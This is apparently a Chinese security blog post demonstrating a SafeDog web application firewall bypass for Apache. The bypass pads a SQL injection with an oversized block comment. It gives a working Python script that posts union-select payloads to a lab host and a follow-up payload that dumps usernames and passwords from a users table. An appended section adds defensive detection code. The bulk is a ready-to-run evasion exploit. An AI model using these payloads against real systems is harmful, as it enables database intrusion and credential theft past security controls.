
SQL injection: bypassing SafeDog for Apache version 3.5.12048 with an oversized request body
Updated: 2021.04.14
WeChat official account: 乌鸦安全
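0x01 Test conditions
- The original request is a GET; the target must also accept POST requests, that is, the target should be reading parameters via `request`
- When sending the request, change the request method in Burp (bp) to POST
- Turn off SafeDog's CC attack protection feature
0x02 Code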
# -*- encoding: utf-8 -*-
# Time : 2021/04/14 15:33:48
# Author: crow
import requests

'''
POST http://10.211.55.9/Less-1/ HTTP/1.1
Host: 10.211.55.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

id=-1' /**/union select 1,2,3 --+
'''

url = 'http://10.211.55.9/Less-1/'
# Baseline body from the captured request above (overwritten inside the loop)
data = "id=-1' /**/ union select 1,2,3 --+"
headers = {
    # "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0",
    # 'Cookie': 'safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267'
    'Host': '10.211.55.9',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'DNT': '1',
    'Connection': 'close',
    # 'Content-Length': '135',
    'Cookie': 'safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'application/x-www-form-urlencoded',
    # requests sets Content-Length from the actual body, so the fixed '34' is dropped
}

# With a 4-character filler, the bypass works starting at 991 repetitions
for i in range(991, 992):
    m = '/*' + 'crow' * i + '*/'
    # print(m)
    data = "id=-1'" + m + "union select 1,2,database() --+"
    res = requests.post(url, headers=headers, data=data).text
    # print(res)
    # The marker string is treated here as the sign of a blocked response
    if 'qt-block-indent:0; text-indent' not in res:
        print('[+] current useful payload length:', i)
    else:
        print('{} not useful'.format(i))
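Screenshot: with a 4-letter filler, the bypass works from 991 repetitions onward.
Basic 991 version, that is, the comment the script above builds as m with crow repeated 991 times.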
0x03 Manual testing
Continuing the test:
group_concat(concat_ws(0x7e,username,password)) from security.users --+
Success.
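A defensive counterpart to the padded request in section 0x02, as an added example that is not part of the original post: a request-body check that inspects the whole body and collapses SQL block comments before matching, shown next to a prefix-only check that misses the padded body. The function names, the 64-character comment threshold and the 1024-character window are assumptions for illustration; the page does not state how SafeDog processes large bodies.

```python
import re
from urllib.parse import unquote_plus

# Block comment, including an unterminated one that runs to the end of the value.
BLOCK_COMMENT = re.compile(r"/\*.*?(?:\*/|\Z)", re.S)
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)
MAX_COMMENT_LEN = 64   # assumed policy threshold, tune per application
PREFIX_WINDOW = 1024   # assumed inspection window of the weak check


def prefix_only_check(body: str, window: int = PREFIX_WINDOW) -> bool:
    """Weak check: the signature only sees the first `window` characters."""
    return bool(UNION_SELECT.search(unquote_plus(body[:window])))


def normalized_check(body: str) -> list:
    """Inspect the whole body; comments are measured, then collapsed."""
    decoded = unquote_plus(body)
    reasons = []
    longest = max((len(c) for c in BLOCK_COMMENT.findall(decoded)), default=0)
    if longest > MAX_COMMENT_LEN:
        reasons.append("oversized-comment")
    # Replace each comment with one space so padding cannot separate or
    # displace the keywords the signature looks for.
    if UNION_SELECT.search(BLOCK_COMMENT.sub(" ", decoded)):
        reasons.append("union-select")
    return reasons


# Constructed sample bodies in the shape used on this page.
PADDED = "id=-1'" + "/*" + "crow" * 991 + "*/" + "union select 1,2,database() --+"
SHORT = "id=-1' /**/union select 1,2,3 --+"
BENIGN = "id=1"

if __name__ == "__main__":
    for name, body in (("padded", PADDED), ("short", SHORT), ("benign", BENIGN)):
        print(name, len(body), prefix_only_check(body), normalized_check(body))
```

Logging the comment length alongside the verdict gives a detection signal that is independent of the keyword signature.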